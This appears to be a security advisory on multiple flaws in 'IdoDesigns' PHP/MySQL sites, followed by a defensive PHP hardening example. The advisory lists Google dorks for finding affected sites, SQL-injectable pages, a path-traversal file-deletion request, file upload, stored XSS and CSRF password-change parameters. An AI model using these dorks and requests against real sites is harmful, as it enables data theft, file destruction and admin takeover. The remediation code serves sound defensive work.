IdoDesigns - Multiple Vulnerabilities

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > IdoDesigns - Multiple Vulnerabilities
.:. Google Dorks
    "Design by www.idodesigns.in"
    "Web Design by : www.idodesigns.in"
    "Design by : I DO Designs"
    You may use the dorks followed by inurl:?id= like ["Design by : I DO Designs" inurl:?id=]
.:. Date: March 05, 2025
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.idodesigns.in/
.:. Product Version -> 1.0
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Most PHP pages fail to secure their parameters against SQLi, resulting in unauthenticated SQL injection. Some pages wrap the parameter in Base64 to help secure it, but that is insufficient. Examples:

/blog-details.php?id=
/services-details.php?id=
/gallery-more.php?id=
/award-details.php?id=
/program-details.php?id=
/project-details.php?id=
/photos.php?id=

Admin Page [Authenticated] Multiple Exploits

1- Authenticated Arbitrary File Deletion:
Parameter -> image
GET https://site/ADMIN PAGE/blogAdd.php?delete_image=&img_id=1&id=3&image=../../../index.php

2- Authenticated Arbitrary File Upload:
POST https://site/ADMIN PAGE/blogAdd.php?edit=1&id=3
Parameter -> images[]

3- Stored XSS:
Most [POST] requests to edit pages, posts or users have vulnerable parameters that store XSS, which can result in website defacement.

4- CSRF is possible to update the admin password
File: /site/admin page/changePassword.php
Parameters & data: new_pwd=x&confirm_pwd=x&submit=
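The two root causes that recur in this advisory are an id parameter (plain or Base64-wrapped) that reaches a MySQL query unvalidated, and a file name taken from the request and handed to the filesystem. The following is an added, defender-side illustration of how a PHP/MySQL page can handle both so that neither the injection nor the `../` deletion applies; it is not code from the advisory or from the vendor's product. The PDO connection details, the constant `UPLOAD_DIR`, the tables `blog` and `blog_images` and their column names, and the `csrf_token` session key are all assumptions made for the example.

```php
<?php
// Added example (not the vendor's code): hardened handling of ?id= and of an
// image-delete action. UPLOAD_DIR, table and column names are assumptions.
declare(strict_types=1);

define('UPLOAD_DIR', '/var/www/html/uploads'); // assumed upload root

// Decode a Base64-wrapped id and accept it only if it is a positive integer.
// Base64 is an encoding, not a control: after decoding, the value is validated
// exactly as a plain ?id= would be.
function parseId(string $raw): ?int
{
    $decoded = base64_decode($raw, true);      // strict: reject non-Base64 input
    if ($decoded === false || !preg_match('/^[1-9][0-9]{0,9}$/', $decoded)) {
        return null;
    }
    return (int) $decoded;
}

// Fetch one blog row with a bound parameter; the id never touches the SQL text.
function fetchBlog(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, title, body FROM blog WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Resolve an image name to a path inside UPLOAD_DIR, or return null.
// basename() drops directory components ("../../../index.php" becomes
// "index.php"); realpath() then proves the result is under the upload root.
function safeImagePath(string $image): ?string
{
    $name = basename($image);
    if ($name === '' || $name[0] === '.') {
        return null;
    }
    $root = realpath(UPLOAD_DIR);
    $path = realpath(UPLOAD_DIR . DIRECTORY_SEPARATOR . $name);
    if ($root === false || $path === false) {
        return null;
    }
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;                           // resolved outside the upload root
    }
    return $path;
}

// Delete an image only if the record identified by img_id actually owns that
// file name (so a request cannot name an arbitrary upload) and only inside UPLOAD_DIR.
function deleteImage(PDO $pdo, int $imgId, string $image): bool
{
    $path = safeImagePath($image);
    if ($path === null) {
        return false;
    }
    $stmt = $pdo->prepare('SELECT 1 FROM blog_images WHERE id = :id AND file_name = :name');
    $stmt->bindValue(':id', $imgId, PDO::PARAM_INT);
    $stmt->bindValue(':name', basename($image), PDO::PARAM_STR);
    $stmt->execute();
    if ($stmt->fetchColumn() === false) {
        return false;
    }
    return is_file($path) && unlink($path);
}

// Constant-time comparison of the submitted CSRF token with the session copy.
function csrfTokenValid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

// Assumed entry point for the page.
session_start();
$pdo = new PDO('mysql:host=localhost;dbname=site', 'user', 'pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,       // server-side prepared statements
]);

$id = parseId($_GET['id'] ?? '');
if ($id === null) {
    http_response_code(400);
    exit('invalid id');
}

// State changes go over POST and carry a CSRF token; the advisory's GET-driven
// delete_image and token-less changePassword.php are what this rules out.
if (isset($_POST['delete_image'])) {
    if (!csrfTokenValid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('bad csrf token');
    }
    $ok = deleteImage($pdo, (int) ($_POST['img_id'] ?? 0), (string) ($_POST['image'] ?? ''));
    exit($ok ? 'deleted' : 'refused');
}

// Output encoding on every stored field is what keeps a stored payload inert.
$blog = fetchBlog($pdo, $id);
echo $blog === null ? 'not found' : htmlspecialchars($blog['title'], ENT_QUOTES, 'UTF-8');
```

The Base64 point is the one most worth taking from the advisory: decoding the parameter changes nothing about the query it lands in, so the decoded value still needs the same integer validation and parameter binding as a raw `?id=`. For the delete action, `basename()` alone is not the containment check; the `realpath()` prefix comparison and the ownership lookup are, and together they cover both the traversal and the case of a valid upload name that belongs to a different record.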


Article source: https://cxsecurity.com/issue/WLB-2025030004